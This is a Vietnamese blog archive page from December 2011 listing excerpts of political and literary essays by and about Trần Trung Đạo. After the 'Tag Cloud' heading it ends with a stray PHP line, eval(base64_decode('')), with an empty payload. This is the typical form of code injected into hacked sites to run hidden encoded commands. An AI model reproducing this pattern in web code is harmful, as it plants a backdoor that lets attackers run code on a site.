Archive for December, 2011

Trần Trung Đạo: Khi tiếng khóc chính là lời tố cáo

Trần Trung Đạo: Khi tiếng khóc chính là lời tố cáo

(Hình: tang lễ Mother Teresa)Dù dưới một quan điểm tôn giáo nào, sự có mặt của con người trên thế giới này chỉ diễn ra trong một khoảng thời gian rất ngắn. Với tác giả bài viết này và có lẽ với nhiều độc giả, tiếng sóng vỗ và

12.27.2011 | Tiểu Luận- Chính Luận |

3 Comments

Trần Trung Đạo: Diễn biến, chống diễn biến và tự diễn biến hòa bình

Trần Trung Đạo: Diễn biến, chống diễn biến và tự diễn biến hòa bình

Tháng 4/1994, trước làn sóng cách mạng dân chủ diễn ra tại Đông Âu, “diễn biến hòa bình” vốn là một đe dọa, đã được Trung ương Đảng Cộng Sản Việt Nam đưa lên hàng nguy cơ, và là một trong bốn nguy cơ hàng đầu trong Báo cáo

12.25.2011 | Tiểu Luận- Chính Luận |

5 Comments

Uyên Nguyên: Trần Trung Đạo, Thơ Chuyển Lửa Lên Con Đường Thế Hệ

Uyên Nguyên: Trần Trung Đạo, Thơ Chuyển Lửa Lên Con Đường Thế Hệ

‘Nửa đêm không bóng người bên suối Sao tiếng gươm mài vang dưới trăng’ Trần Trung Đạo 1. Biết anh Trần Trung Đạo đã nhiều năm, tuy cách xa, mà anh em vẫn đối với nhau rất gần, bởi từng tâm giao, gắn bó trong nhiều hoạt động.

12.3.2011 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>